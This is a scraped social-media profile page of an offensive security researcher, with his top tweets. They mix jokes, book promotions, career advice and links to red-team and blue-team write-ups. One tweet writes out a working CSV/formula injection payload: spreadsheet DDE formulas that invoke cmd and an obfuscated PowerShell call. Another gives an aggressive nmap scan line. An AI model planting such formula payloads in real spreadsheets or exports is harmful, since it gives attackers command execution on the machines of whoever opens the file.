Andy Gill
@ZephrFish
Followers
19,242
Following
457
Media
8,674
Statuses
39,142
Defcon SOC goon, Offensive Security Researcher. Photos account over at @ZephrSnaps . Former Co-Host of @WeegieCast . Staff on @curatedintel . Mod @breakdev_org
Glasgow, Scotland
Joined March 2009
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Rio Grande do Sul
• 134797 Tweets
Madonna
• 126157 Tweets
Boeing
• 119118 Tweets
Nathan
• 92350 Tweets
Irak
• 64008 Tweets
عدنان البرش
• 41958 Tweets
#SRHvRR
• 35919 Tweets
Olimpiade
• 28951 Tweets
Bhuvi
• 22955 Tweets
KPLC
• 19730 Tweets
Bruno Mars
• 19651 Tweets
Marselino
• 19279 Tweets
زياد
• 17375 Tweets
Ernando
• 14499 Tweets
Canna
• 14176 Tweets
ALGS
• 12294 Tweets
Guinea
• 12169 Tweets
Hubner
• 12081 Tweets
Pinned Tweet
Running a discount on both my books; LTR101 & LTR102 get both for $12.99 as a bundle which is $30 saving if you were to buy them separately!
#cybersecuritystudents
#netsecstudents
#learning
#pentesting
#blueteam
#cti
#redteam
enjoy!
0
1
6
To the person who stole my Microsoft Office License.
I'm gonna find you. You have my Word.
79
258
3K
Security is like an onion, the more layers you reveal, the more you cry
41
683
2K
Cyber Defenders website have some good free labs for Blue/Purple Team including:
1. SIEM
2. Malware Analysis
3. Forensic
4. Reversing
5. OSINT
6. Packet Analysis
7. Malicious Document Inspection
13
366
1K
Bought my dream car today, it'll have my R2 HAX plate on it once paperwork comes through 😎😊
71
10
607
When you've got a ridiculous path to DA and you're explaining it
9
66
521
Pentesters, Red Teamers, Blue Teamers, SOC analysts of Twitter, what's the biggest lesson you've learned in your career?
279
96
482
Might consider giving some away, RT for an opportunity to win!
#BicCertified
designed these a year ago and they've been super popular!!! I've got 100 available a few already reserved.
27
363
455
I've spent a few days writing up
#ZeroLogon
from both a
#RedTeam
and
#BlueTeam
perspective to help me expand my
#PurpleTeam
knowledge, it is very much a sit down and read post
13
198
391
When you're ready to start the path remember you need to be able to not only hack but also speak to customers in meetings, write reports and translate tech to business. There's a big disconnect between the actual security consultant side and the hacking sadly.
16
57
354
4
180
328
After a few weeks writing it up, here's my
#SSH
lockdown guide, with a few cool things thanks to
@TimmehWimmy
&
@pjvenda
for ideas
8
117
310
You've heard of 0nly fans, now comes 0DayFans
11
93
297
=cmd|'/c REM.&&
@p
^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_zephr.A1
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c REM.&&
@p
^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_zephr.A1
#CSVInjection
#RedTeam
6
127
293
I did a blog post about
#Bloodhound
and leveraging it for
#BlueTeam
and
#RedTeam
scenarios check it out here
You know that
#BloodHound
for Active Directory is a great tool, right? Well, our
@ZephrFish
has written an in-depth walkthrough on how to best use it for
#redteaming
. He’s nice like that.
2
237
527
6
93
284
Bob Ross on IT: We're just going to set ourselves up a nice little domain controller over here. Don't forget to deploy your roles and ACLs, no matter how big or small each one of them is unique and special just like you. Don't forget happy little outages and maintenance.
6
39
270
"I want to be a Pentester"
"Have you thought of our lord and saviour blue team?"
"I want to do the hacks"
14
32
270
Taken me ages to write but here it is! A nice RCE that I found a few months ago
#ltr101
#pentesting
#bugbounty
5
156
265
My mum should work in security, she saw my background on phone and researched who the artist(
@liamwong
) was then bought me his book!
4
15
249
While I've started work on a second book, I've also decided to drop the minimum cost of my
#LTR101
book to free feel free to share with those who are looking at starting out in pentesting or bug hunting, I've been told it's a pretty good read! RT please
6
134
247
SSH blog is about 60% done, aiming to publish tomorrow. So far covering:
Enabling key based authentication and generating secure keys!
Enabling Multi Factor Authentication (MFA)
Enabling Rate-Limiting and Firewalling
Obscuring Your Setup
Login Notifications via Telegram & Slack
11
31
251
sudo nmap -sS -Pn -n -p 0-65535 -f -R -T4 --min-parallelism 64 --reason --open -vvv -A -oA output_nmap <target> --script-trace;
8
67
226
Folks were asking about writing reports for bug bounties, I've written a few posts and templates in the past
0
82
212
Genuinely who thought this was a good idea, locate your camera via the cloud with pin point accuracy. Feels like the car alarm research all over again 🙈
14
55
201
3
1
178
After many discussions with people looking to get into this sector I've decided that my book will remain free even after the new year! I also have plans to write a second potentially about tricks of the trade...
9
82
189
6 months in the making
#ltr101
is published! Get it here for only $5, please RT and share :-) Enjoy!
20
106
186
Ended up working on it today instead, I give you May the Shells be with You - A Star Wars RCE Adventure!
6
94
180
Looks like the original PoC for PrintNightmare (CVE-2021-1675) got deleted but someone has forked it since
5
66
178
Def con 31 (2023)
August 10-13, 2023
Caesar's Forum
Linq, Harrah's, Flamingo
See you all next year!
4
26
176
Red Teaming is Blue Team QA
Pentesting is Security Controls QA
👀
16
26
164
Here's a post out of my norm, discussing a really important topic that is close to my heart and I've seen so many suffer from
#supporteachother
#mentalhealth
#goodtotalk
#MentalHealthMatters
@hackershealth
#ImposterSyndrome
15
67
162
I've installed a firewall, it doesn't seem to be working as expected?
26
11
155
3 weeks of writing and multiple years of playing about here's my latest blog post
#RedTeam
#BlueTeam
#PurpleTeam
#CobaltStrike
5
65
157
Couldn't sleep, so I rewrote a tool I wrote a while ago for google dorking, there are tonnes of tools out there that do it already, but I fancied a challenge. Check it out
#BugBounty
#Pentesting
#OSINT
4
65
153
Original Hacker Space Energy Flavour, Made from blue team tears
14
9
148
On the topic of
#BsidesLDN2019
I'll also have
#BicCertified
stickers with me and a few physical copies of
#LTR101
20
15
145
Not that anybody ever trusts PoCs that I put out anyways but I ported the ruby exploit code for the
#MOVEit
vulnerability to Python if anybody's interested
6
37
144
I went to my first fight club meeting last night, i showed up late so i missed the first few rules but it was awesome i love fight club cant wait for the next meeting
10
19
141
3
9
142
There we go 30 days in
#RTO
course & exam review is live enjoy folks, thanks to
@_RastaMouse
for a great course and exam.
10
39
139
Incredibly excited to be joining
@Lares_
as their first hire this side of the Atlantic, looking forward to learning and enriching my knowledge. Starting on Monday 🎉
39
6
135
Hear me out, network pentesting is just offensive sys-admining with different objectives
16
13
130
Fuck yeah! My
@Steel_Con
just got accepted! "Hunting Sh*T Up - Red Teaming with A Bug Hunter's Mindset" is what I'll be talking about :D
9
11
131
3 years sober today, so many classics unopened to gift to others
22
0
130
Geared up in Red for
@defcon
, not rocking this year's shirt till I'm on shift tomorrow but DC25 shirt + name badge at least. If you see me say hi 😊
3
14
124
Pick up my dream car on Wednesday 🙈😁
30
0
128
So today was my last day at
@PenTestPartners
, it's been a blast folks, really enjoyed the last three and a half years. Thanks to
@TheKenMunroShow
&
@tautology0
for offering me the opportunity three and a half years ago! 🔥
19
4
123
